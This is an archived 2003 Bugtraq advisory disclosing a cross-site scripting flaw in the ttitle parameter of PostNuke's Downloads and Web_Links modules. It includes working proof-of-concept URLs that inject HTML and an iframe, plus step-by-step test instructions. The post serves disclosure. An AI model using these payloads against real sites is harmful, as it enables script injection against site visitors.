| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 10 Aug 2003 19:27:38 +0200 From: "Lorenzo Hernandez Garcia-Hierro" <novappc@...appc.com> To: bugtraq@...urityfocus.com Subject: PostNuke Downloads & Web_Links ttitle variable XSS PostNuke Downloads & Web_Links ttitle variable XSS ------ Product: PostNuke Vendor: PostNuke WWW.POSTNUKE.COM <http://www.POSTNUKE.COM> Versions Vulnerable: PostNuke Phoenix 0.7.x.x Phoenix 0.7.2.3 with patches ( in all versions ) Phoenix 0.7.2.3 without patches (in all versions ) 0.7.2.1 (All prior versions of 0.7.2.3 with/without patches) NO VULNERABLE VERSIONS - ? --------------------- Description: PostNuke , one of the most used php portal systems , is affected again by XSS attacks , now in some modules that use vulnerable url-passed variables.Again , the XSS is made by closing tags technic ( we think that we were the first group using this technic ) and passing the url encoded value of the "> , it is "%3e . ----------------------------------------- SECURITY HOLES FOUND and PROOFS OF CONCEPT: ----------------------------------------- I encountered a XSS ( Cross Site Scripting ) vulnerability in the ttitle variable of Downloads & Web_Links module that allows you to include script code in the website. --------------------- | XSS IN | | TTITLE | --------------------- The XSS is in the VARIABLE OF THE DOWNLOADS MODULE CALLED TTITLE : http://[HOST]/[PATH]/modules.php? op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=[ID] &ttitle=[Yeye XSS ;-)]"%3e[XSS ATTACK] And you get , of course , the xss attack in the download page . Simple and fast. And the Web_Links module hole... http://[HOST]/[PATH]/modules.php? op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=[ID] &ttitle=[MORE ? ;-(]"%3e[XSS ATTACK] Examples: http://[HOST]/[PATH]/modules.php? op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle= Mocosoft Utilities"%3e<h1>I like this hell</h1> http://[HOST]/[PATH]/modules.php? op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=25532543254 46&ttitle=%73%63%6F,%66%61%6B%20%75"%3e<h1>Un ASCII it...</h1><iframe src=http://packetstorm.linuxsecurity.com/javascript/text-convertor- v2.0.html></iframe> - Proof of Concepts: - 1.- Check a PostNuke portal. 2.- Check if the Downloads / Web_Links modules are active and.. 3.- modify the ttitle variable using "%3e and write a xss attack for test it. 4.- that's all folks ----------- | CONTACT | ----------- Lorenzo Hernandez Garcia-Hierro --- Computer Security Analyzer --- --Nova Projects Professional Coding-- PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 ********************************** www.novappc.com security.novappc.com www.lorenzohgh.com ______________________ NSRG-19-7
Powered by blists - more mailing lists